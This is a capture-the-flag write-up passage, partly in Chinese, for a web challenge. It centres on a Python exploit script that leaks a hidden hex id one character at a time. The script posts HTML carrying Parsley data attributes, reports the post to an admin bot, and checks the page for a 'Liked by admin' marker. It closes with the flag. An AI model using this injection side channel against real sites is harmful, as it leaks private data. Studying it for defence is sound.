ArticleShare
在前端代码中得知：side channel attack
exp如下
``` import requests import time import sys
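def main(host, port):
    """Recover a hidden id character by character via a like-based side channel.

    For each position, every hex character is tried in turn: a post is
    submitted whose content carries Parsley validation attributes, the post
    is reported to ``admin.php``, and after a fixed wait the post's
    ``lookup.php`` page is fetched and checked for the ``"Liked by</h3>admin"``
    marker.  A guess is accepted when that marker is *absent* (the ``if``
    below); the accepted character is appended to ``flag`` and the next
    position is tried.

    Args:
        host: target host name or address.
        port: target port.

    Side effects: HTTP requests only; progress is printed to stdout.
    Positions (16) and the alphabet (hex) are hard-coded.  When a position
    never resolves, step 4 of the writeup describes the manual recovery.

    Root cause as far as the payload shows: user-supplied HTML submitted as
    ``content`` is apparently rendered on a page where ``data-parsley-*``
    attributes are honoured, so a selector in the stored content can steer
    where injected markup lands.  Stripping ``data-*`` attributes from
    stored content would close that channel.
    """
    s = requests.Session()
    base_url = f"http://{host}:{port}/"

    # The CSRF token is the value of the hidden input named "c".  The
    # original script slices 16 characters; its length is not verified here.
    res = s.get(base_url)
    marker = 'name="c" value="'
    pos = res.text.find(marker) + len(marker)
    csrftoken = res.text[pos:pos + 16]

    ss = "abcdef0123456789"
    flag = ""
    for i in range(16):
        for j in ss:
            print("trying", j)
            # Parsley places the error-message HTML into the element matched
            # by the errors-container selector; the selector only matches a
            # link whose href starts with the current guess, so the injected
            # "like" button presumably only exists for a correct prefix.
            payload = f'''<form data-parsley-validate>
<input data-parsley-required
data-parsley-trigger="blur"
data-parsley-error-message="<input type=button id=like>"
data-parsley-errors-container="a[href^='/lookup.php?id={flag + j}']"
autofocus>
</form>'''
            data = {'c': csrftoken, 'content': payload}
            res = s.post(base_url + "add.php", data=data, allow_redirects=False)
            # add.php answers with a redirect whose target carries the new
            # post's id; redirects are not followed so the header is readable.
            location = res.headers['Location']
            pos = location.find('id=') + 3
            wp = location[pos:]
            # Report the post, then wait for the admin bot to visit it.
            data = {'c': csrftoken, 'id': wp}
            res = s.post(base_url + "admin.php", data=data)
            time.sleep(10)
            res = s.get(f"http://{host}:{port}/lookup.php?id={wp}")
            # Newlines are stripped so the marker matches regardless of
            # how the markup is wrapped.
            txt = res.text.replace("\n", "").replace("\r", "")
            if "Liked by</h3>admin" not in txt:
                flag += j
                print(i, flag)
                break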
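if __name__ == '__main__':
    # Host and port are redacted in the writeup.
    main("********", "*****")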
4. 如果中间出现某一位爆不出来，就把前面已经爆出来的几位去掉最后一位，然后添加在 flag 前面继续爆即可。
5. flag如下：

```
ctf{s1d3_ch4nn3l_attack_is_funny_bluecup2023_got_it}
```